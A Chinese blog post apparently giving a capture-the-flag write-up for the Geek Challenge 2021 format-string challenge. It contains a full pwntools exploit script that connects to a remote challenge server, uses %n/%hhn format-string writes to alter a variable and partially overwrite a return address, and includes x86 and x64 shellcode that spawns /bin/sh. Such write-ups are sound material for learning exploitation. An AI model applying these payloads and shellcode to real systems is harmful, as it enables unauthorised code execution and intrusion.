ReStr0
Venom战队队员 Chamd5安全团队
ReStr0-Blog

Geek challenge 2021

FORMAT_STRING

一道格式化字符串的题目,因为一些粗心和遗忘问题,,竟然卡了

https://blog.restro.cn/wp-content/uploads/2021/11/image-2.png

一共是两关,第一关是修改v3的数值,使它等于12

第二关就是获取shell

随后发现无法直接覆盖返回地址到backdoor的地址,只能通过修改ret_addr的后两位,让他直接抵达

https://blog.restro.cn/wp-content/uploads/2021/11/image-3.png

于是就可以getshell了

EXP

# _*_ coding:utf-8 _*_
from pwn import *
context.log_level = 'debug'

#p=process("format")
p=remote("123.57.230.48","12342")




def debug(addr,PIE=True): 
    debug_str = ""
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16) 
        for i in addr:
            debug_str+='b *{}\n'.format(hex(text_base+i))
        gdb.attach(p,debug_str) 
    else:
        for i in addr:
            debug_str+='b *{}\n'.format(hex(i))
        gdb.attach(p,debug_str) 

def dbg():
    gdb.attach(p)
#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))        #in case that data is an int
sa      = lambda delim,data         :p.sendafter(str(delim), str(data)) 
sl      = lambda data               :p.sendline(str(data)) 
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data)) 
r       = lambda numb=4096          :p.recv(numb)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
it      = lambda                    :p.interactive()
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))
bp      = lambda bkp                :pdbg.bp(bkp)
li      = lambda str1,data1         :log.success(str1+'========>'+hex(data1))

    
def dbgc(addr):
    gdb.attach(p,"b*" + hex(addr) +"\n c")

def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

ru("0x")
stack = int(r(8),16)
lg('stack',stack)#print

sleep(0.1)

pay = "%7ca"+p32(stack)+"%16$n"
sl(pay)
sleep(0.1)
ret_addr = stack + 0x10
pay = p32(ret_addr) + "%140c" + "%7$hhn" + "%19$p"
sl(pay)
it()

发表评论

textsms
account_circle
email

ReStr0-Blog

Geek challenge 2021
FORMAT_STRING 一道格式化字符串的题目,因为一些粗心和遗忘问题,,竟然卡了 一共是两关,第一关是修改v3的数值,使它等于12 第二关就是获取shell 随后发现无法直接覆盖…
扫描二维码继续阅读
2021-11-09